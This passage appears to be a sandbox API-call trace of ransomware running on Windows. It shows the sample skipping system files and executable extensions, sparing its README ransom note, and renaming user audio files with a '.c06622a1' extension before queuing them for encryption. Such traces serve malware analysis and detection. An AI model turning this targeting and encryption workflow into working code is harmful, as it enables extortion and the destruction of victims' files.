ftCreationTime.dwLowDateTime=0x36ca2860, ftCreationTime.dwHighDateTime=0x1d5e717, ftLastAccessTime.dwLowDateTime=0x4283a510, ftLastAccessTime.dwHighDateTime=0x1d5db09, ftLastWriteTime.dwLowDateTime=0x4283a510, ftLastWriteTime.dwHighDateTime=0x1d5db09, nFileSizeHigh=0x0, nFileSizeLow=0x8439, dwReserved0=0x0, dwReserved1=0x0, cFileName="dirC_ 6.wav", cAlternateFileName="DIRC_6~1.WAV")) returned 1 [0159.757] _wcsicmp (_Str1="dirC_ 6.wav", _Str2="README.c06622a1.TXT") returned -14 [0159.757] wcsstr (_Str="dirC_ 6.wav", _SubStr="README") returned 0x0 [0159.757] _wcsicmp (_Str1="autorun.inf", _Str2="dirC_ 6.wav") returned -3 [0159.757] wcslen (_String="autorun.inf") returned 0xb [0159.757] _wcsicmp (_Str1="boot.ini", _Str2="dirC_ 6.wav") returned -2 [0159.757] wcslen (_String="boot.ini") returned 0x8 [0159.757] _wcsicmp (_Str1="bootfont.bin", _Str2="dirC_ 6.wav") returned -2 [0159.757] wcslen (_String="bootfont.bin") returned 0xc [0159.757] _wcsicmp (_Str1="bootsect.bak", _Str2="dirC_ 6.wav") returned -2 [0159.757] wcslen (_String="bootsect.bak") returned 0xc [0159.757] _wcsicmp (_Str1="desktop.ini", _Str2="dirC_ 6.wav") returned -4 [0159.757] wcslen (_String="desktop.ini") returned 0xb [0159.757] _wcsicmp (_Str1="iconcache.db", _Str2="dirC_ 6.wav") returned 5 [0159.758] wcslen (_String="iconcache.db") returned 0xc [0159.758] _wcsicmp (_Str1="ntldr", _Str2="dirC_ 6.wav") returned 10 [0159.758] wcslen (_String="ntldr") returned 0x5 [0159.758] _wcsicmp (_Str1="ntuser.dat", _Str2="dirC_ 6.wav") returned 10 [0159.758] wcslen (_String="ntuser.dat") returned 0xa [0159.758] _wcsicmp (_Str1="ntuser.dat.log", _Str2="dirC_ 6.wav") returned 10 [0159.758] wcslen (_String="ntuser.dat.log") returned 0xe [0159.758] _wcsicmp (_Str1="ntuser.ini", _Str2="dirC_ 6.wav") returned 10 [0159.758] wcslen (_String="ntuser.ini") returned 0xa [0159.758] _wcsicmp (_Str1="thumbs.db", _Str2="dirC_ 6.wav") returned 16 [0159.758] wcslen (_String="thumbs.db") returned 0x9 [0159.758] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0159.758] wcslen (_String="386") returned 0x3 [0159.758] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0159.758] wcslen (_String="adv") returned 0x3 [0159.758] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0159.758] wcslen (_String="ani") returned 0x3 [0159.758] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0159.758] wcslen (_String="bat") returned 0x3 [0159.758] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0159.758] wcslen (_String="bin") returned 0x3 [0159.758] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0159.758] wcslen (_String="cab") returned 0x3 [0159.758] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0159.758] wcslen (_String="cmd") returned 0x3 [0159.758] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0159.758] wcslen (_String="com") returned 0x3 [0159.758] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0159.758] wcslen (_String="cpl") returned 0x3 [0159.758] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0159.758] wcslen (_String="cur") returned 0x3 [0159.759] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0159.759] wcslen (_String="deskthemepack") returned 0xd [0159.759] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0159.759] wcslen (_String="diagcab") returned 0x7 [0159.759] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0159.759] wcslen (_String="diagcfg") returned 0x7 [0159.759] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0159.759] wcslen (_String="diagpkg") returned 0x7 [0159.759] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0159.759] wcslen (_String="dll") returned 0x3 [0159.759] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0159.759] wcslen (_String="drv") returned 0x3 [0159.759] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0159.759] wcslen (_String="exe") returned 0x3 [0159.759] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0159.759] wcslen (_String="hlp") returned 0x3 [0159.759] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0159.759] wcslen (_String="icl") returned 0x3 [0159.759] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0159.759] wcslen (_String="icns") returned 0x4 [0159.759] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0159.759] wcslen (_String="ico") returned 0x3 [0159.759] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0159.759] wcslen (_String="ics") returned 0x3 [0159.759] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0159.759] wcslen (_String="idx") returned 0x3 [0159.759] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0159.759] wcslen (_String="ldf") returned 0x3 [0159.759] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0159.759] wcslen (_String="lnk") returned 0x3 [0159.759] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0159.759] wcslen (_String="mod") returned 0x3 [0159.760] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0159.760] wcslen (_String="mpa") returned 0x3 [0159.760] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0159.760] wcslen (_String="msc") returned 0x3 [0159.760] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0159.760] wcslen (_String="msp") returned 0x3 [0159.760] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0159.760] wcslen (_String="msstyles") returned 0x8 [0159.760] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0159.760] wcslen (_String="msu") returned 0x3 [0159.760] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0159.760] wcslen (_String="nls") returned 0x3 [0159.760] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0159.760] wcslen (_String="nomedia") returned 0x7 [0159.760] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0159.760] wcslen (_String="ocx") returned 0x3 [0159.760] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0159.760] wcslen (_String="prf") returned 0x3 [0159.760] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0159.760] wcslen (_String="ps1") returned 0x3 [0159.760] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0159.760] wcslen (_String="rom") returned 0x3 [0159.760] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0159.760] wcslen (_String="rtp") returned 0x3 [0159.760] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0159.760] wcslen (_String="scr") returned 0x3 [0159.760] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0159.760] wcslen (_String="shs") returned 0x3 [0159.760] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0159.760] wcslen (_String="spl") returned 0x3 [0159.760] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0159.760] wcslen (_String="sys") returned 0x3 [0159.760] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0159.761] wcslen (_String="theme") returned 0x5 [0159.761] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0159.761] wcslen (_String="themepack") returned 0x9 [0159.761] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0159.761] wcslen (_String="wpx") returned 0x3 [0159.761] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0159.761] wcslen (_String="lock") returned 0x4 [0159.761] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0159.761] wcslen (_String="key") returned 0x3 [0159.761] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0159.761] wcslen (_String="hta") returned 0x3 [0159.761] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0159.761] wcslen (_String="msi") returned 0x3 [0159.761] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0159.761] wcslen (_String="pdb") returned 0x3 [0159.761] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0159.761] wcslen (_String="sqlite") returned 0x6 [0159.761] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k-ci7bu1asxti5iwzuur")) returned 0x10 [0159.761] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.761] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR" [0159.761] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR") returned 0x3c [0159.761] wcscpy (in: _Dest=0x32400da, _Source="dirC_ 6.wav" | out: _Dest="dirC_ 6.wav") returned="dirC_ 6.wav" [0159.761] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\dirC_ 6.wav", dwFileAttributes=0x80) returned 1 [0159.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\dirC_ 6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k-ci7bu1asxti5iwzuur\\dirc_ 6.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d0 [0159.762] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.762] ReadFile (in: hFile=0x1d0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0159.762] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xab9e1337 [0159.763] RtlComputeCrc32 (PartialCrc=0x1337, Buffer=0x32e9a4, Length=0x80) returned 0xf2dd1518 [0159.763] RtlComputeCrc32 (PartialCrc=0x1518, Buffer=0x32e9a4, Length=0x80) returned 0x7a76a1b6 [0159.763] RtlComputeCrc32 (PartialCrc=0xa1b6, Buffer=0x32e9a4, Length=0x80) returned 0x5b8f2063 [0159.763] RtlComputeCrc32 (PartialCrc=0x2063, Buffer=0x32e9a4, Length=0x80) returned 0xe68f33e5 [0159.763] CloseHandle (hObject=0x1d0) returned 1 [0159.763] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.763] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\dirC_ 6.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\dirC_ 6.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\dirC_ 6.wav" [0159.763] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\dirC_ 6.wav") returned 0x48 [0159.763] wcscpy (in: _Dest=0x32500f8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.763] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\dirC_ 6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k-ci7bu1asxti5iwzuur\\dirc_ 6.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\dirC_ 6.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k-ci7bu1asxti5iwzuur\\dirc_ 6.wav.c06622a1"), dwFlags=0x8) returned 1 [0159.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\dirC_ 6.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k-ci7bu1asxti5iwzuur\\dirc_ 6.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d0 [0159.765] CreateIoCompletionPort (FileHandle=0x1d0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0159.765] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0159.772] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x37ebf5b0 [0159.772] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7c9e295e [0159.772] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6204b985 [0159.772] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xf39dee6 [0159.772] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6144a08b [0159.772] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x60ccef4b [0159.772] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x25299f30 [0159.772] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6c87f0cc [0159.776] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0xa15e167a [0159.776] RtlComputeCrc32 (PartialCrc=0x167a, Buffer=0x2690094, Length=0x80) returned 0x4b4a9b6a [0159.776] RtlComputeCrc32 (PartialCrc=0x9b6a, Buffer=0x2690094, Length=0x80) returned 0xdb1a86f0 [0159.776] RtlComputeCrc32 (PartialCrc=0x86f0, Buffer=0x2690094, Length=0x80) returned 0xe71bd0d9 [0159.776] RtlComputeCrc32 (PartialCrc=0xd0d9, Buffer=0x2690094, Length=0x80) returned 0x2cdf1971 [0159.776] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0159.776] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.776] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.776] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cec8440, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8cec8440, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8cec8440, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0159.776] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0159.776] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9bd1fef0, ftCreationTime.dwHighDateTime=0x1d5e4d7, ftLastAccessTime.dwLowDateTime=0x255a7100, ftLastAccessTime.dwHighDateTime=0x1d5e61a, ftLastWriteTime.dwLowDateTime=0x255a7100, ftLastWriteTime.dwHighDateTime=0x1d5e61a, nFileSizeHigh=0x0, nFileSizeLow=0x55ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="S7xgL3CvoffAc-naWOw.m4a", cAlternateFileName="S7XGL3~1.M4A")) returned 1 [0159.776] _wcsicmp (_Str1="S7xgL3CvoffAc-naWOw.m4a", _Str2="README.c06622a1.TXT") returned 1 [0159.776] wcsstr (_Str="S7xgL3CvoffAc-naWOw.m4a", _SubStr="README") returned 0x0 [0159.776] _wcsicmp (_Str1="autorun.inf", _Str2="S7xgL3CvoffAc-naWOw.m4a") returned -18 [0159.776] wcslen (_String="autorun.inf") returned 0xb [0159.776] _wcsicmp (_Str1="boot.ini", _Str2="S7xgL3CvoffAc-naWOw.m4a") returned -17 [0159.776] wcslen (_String="boot.ini") returned 0x8 [0159.776] _wcsicmp (_Str1="bootfont.bin", _Str2="S7xgL3CvoffAc-naWOw.m4a") returned -17 [0159.776] wcslen (_String="bootfont.bin") returned 0xc [0159.777] _wcsicmp (_Str1="bootsect.bak", _Str2="S7xgL3CvoffAc-naWOw.m4a") returned -17 [0159.777] wcslen (_String="bootsect.bak") returned 0xc [0159.777] _wcsicmp (_Str1="desktop.ini", _Str2="S7xgL3CvoffAc-naWOw.m4a") returned -15 [0159.777] wcslen (_String="desktop.ini") returned 0xb [0159.777] _wcsicmp (_Str1="iconcache.db", _Str2="S7xgL3CvoffAc-naWOw.m4a") returned -10 [0159.777] wcslen (_String="iconcache.db") returned 0xc [0159.777] _wcsicmp (_Str1="ntldr", _Str2="S7xgL3CvoffAc-naWOw.m4a") returned -5 [0159.777] wcslen (_String="ntldr") returned 0x5 [0159.777] _wcsicmp (_Str1="ntuser.dat", _Str2="S7xgL3CvoffAc-naWOw.m4a") returned -5 [0159.777] wcslen (_String="ntuser.dat") returned 0xa [0159.777] _wcsicmp (_Str1="ntuser.dat.log", _Str2="S7xgL3CvoffAc-naWOw.m4a") returned -5 [0159.777] wcslen (_String="ntuser.dat.log") returned 0xe [0159.777] _wcsicmp (_Str1="ntuser.ini", _Str2="S7xgL3CvoffAc-naWOw.m4a") returned -5 [0159.777] wcslen (_String="ntuser.ini") returned 0xa [0159.777] _wcsicmp (_Str1="thumbs.db", _Str2="S7xgL3CvoffAc-naWOw.m4a") returned 1 [0159.777] wcslen (_String="thumbs.db") returned 0x9 [0159.777] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0159.777] wcslen (_String="386") returned 0x3 [0159.777] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0159.777] wcslen (_String="adv") returned 0x3 [0159.777] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0159.777] wcslen (_String="ani") returned 0x3 [0159.777] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0159.777] wcslen (_String="bat") returned 0x3 [0159.777] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0159.777] wcslen (_String="bin") returned 0x3 [0159.777] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0159.777] wcslen (_String="cab") returned 0x3 [0159.777] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0159.777] wcslen (_String="cmd") returned 0x3 [0159.777] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0159.777] wcslen (_String="com") returned 0x3 [0159.778] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0159.778] wcslen (_String="cpl") returned 0x3 [0159.778] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0159.778] wcslen (_String="cur") returned 0x3 [0159.778] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0159.778] wcslen (_String="deskthemepack") returned 0xd [0159.778] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0159.778] wcslen (_String="diagcab") returned 0x7 [0159.778] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0159.778] wcslen (_String="diagcfg") returned 0x7 [0159.778] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0159.778] wcslen (_String="diagpkg") returned 0x7 [0159.778] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0159.778] wcslen (_String="dll") returned 0x3 [0159.778] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0159.778] wcslen (_String="drv") returned 0x3 [0159.778] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0159.778] wcslen (_String="exe") returned 0x3 [0159.778] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0159.778] wcslen (_String="hlp") returned 0x3 [0159.778] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0159.778] wcslen (_String="icl") returned 0x3 [0159.778] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0159.778] wcslen (_String="icns") returned 0x4 [0159.779] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0159.779] wcslen (_String="ico") returned 0x3 [0159.779] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0159.779] wcslen (_String="ics") returned 0x3 [0159.779] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0159.779] wcslen (_String="idx") returned 0x3 [0159.779] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0159.779] wcslen (_String="ldf") returned 0x3 [0159.779] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0159.779] wcslen (_String="lnk") returned 0x3 [0159.779] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0159.779] wcslen (_String="mod") returned 0x3 [0159.779] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0159.779] wcslen (_String="mpa") returned 0x3 [0159.780] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0159.780] wcslen (_String="msc") returned 0x3 [0159.780] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0159.780] wcslen (_String="msp") returned 0x3 [0159.780] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0159.780] wcslen (_String="msstyles") returned 0x8 [0159.780] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0159.780] wcslen (_String="msu") returned 0x3 [0159.780] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0159.780] wcslen (_String="nls") returned 0x3 [0159.780] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0159.780] wcslen (_String="nomedia") returned 0x7 [0159.780] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0159.780] wcslen (_String="ocx") returned 0x3 [0159.780] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0159.780] wcslen (_String="prf") returned 0x3 [0159.780] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0159.780] wcslen (_String="ps1") returned 0x3 [0159.780] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0159.780] wcslen (_String="rom") returned 0x3 [0159.780] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0159.780] wcslen (_String="rtp") returned 0x3 [0159.780] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0159.780] wcslen (_String="scr") returned 0x3 [0159.780] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0159.780] wcslen (_String="shs") returned 0x3 [0159.780] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0159.780] wcslen (_String="spl") returned 0x3 [0159.780] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0159.780] wcslen (_String="sys") returned 0x3 [0159.780] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0159.781] wcslen (_String="theme") returned 0x5 [0159.781] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0159.781] wcslen (_String="themepack") returned 0x9 [0159.781] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0159.781] wcslen (_String="wpx") returned 0x3 [0159.781] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0159.781] wcslen (_String="lock") returned 0x4 [0159.781] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0159.781] wcslen (_String="key") returned 0x3 [0159.781] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0159.781] wcslen (_String="hta") returned 0x3 [0159.781] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0159.781] wcslen (_String="msi") returned 0x3 [0159.781] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0159.781] wcslen (_String="pdb") returned 0x3 [0159.781] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0159.781] wcslen (_String="sqlite") returned 0x6 [0159.781] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k-ci7bu1asxti5iwzuur")) returned 0x10 [0159.781] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.781] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR" [0159.781] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR") returned 0x3c [0159.781] wcscpy (in: _Dest=0x32400da, _Source="S7xgL3CvoffAc-naWOw.m4a" | out: _Dest="S7xgL3CvoffAc-naWOw.m4a") returned="S7xgL3CvoffAc-naWOw.m4a" [0159.781] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\S7xgL3CvoffAc-naWOw.m4a", dwFileAttributes=0x80) returned 1 [0159.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\S7xgL3CvoffAc-naWOw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k-ci7bu1asxti5iwzuur\\s7xgl3cvoffac-nawow.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0159.782] SetFilePointerEx (in: hFile=0x1e0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.782] ReadFile (in: hFile=0x1e0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0159.783] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xec0dd32f [0159.783] RtlComputeCrc32 (PartialCrc=0xd32f, Buffer=0x32e9a4, Length=0x80) returned 0x24543a02 [0159.783] RtlComputeCrc32 (PartialCrc=0x3a02, Buffer=0x32e9a4, Length=0x80) returned 0xbcde8ca2 [0159.783] RtlComputeCrc32 (PartialCrc=0x8ca2, Buffer=0x32e9a4, Length=0x80) returned 0x45101577 [0159.783] RtlComputeCrc32 (PartialCrc=0x1577, Buffer=0x32e9a4, Length=0x80) returned 0xe437a751 [0159.783] CloseHandle (hObject=0x1e0) returned 1 [0159.783] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.783] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\S7xgL3CvoffAc-naWOw.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\S7xgL3CvoffAc-naWOw.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\S7xgL3CvoffAc-naWOw.m4a" [0159.783] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\S7xgL3CvoffAc-naWOw.m4a") returned 0x54 [0159.783] wcscpy (in: _Dest=0x3250110, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.783] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\S7xgL3CvoffAc-naWOw.m4a" (normalized: "c:\\users\\5p5nrgjn0js 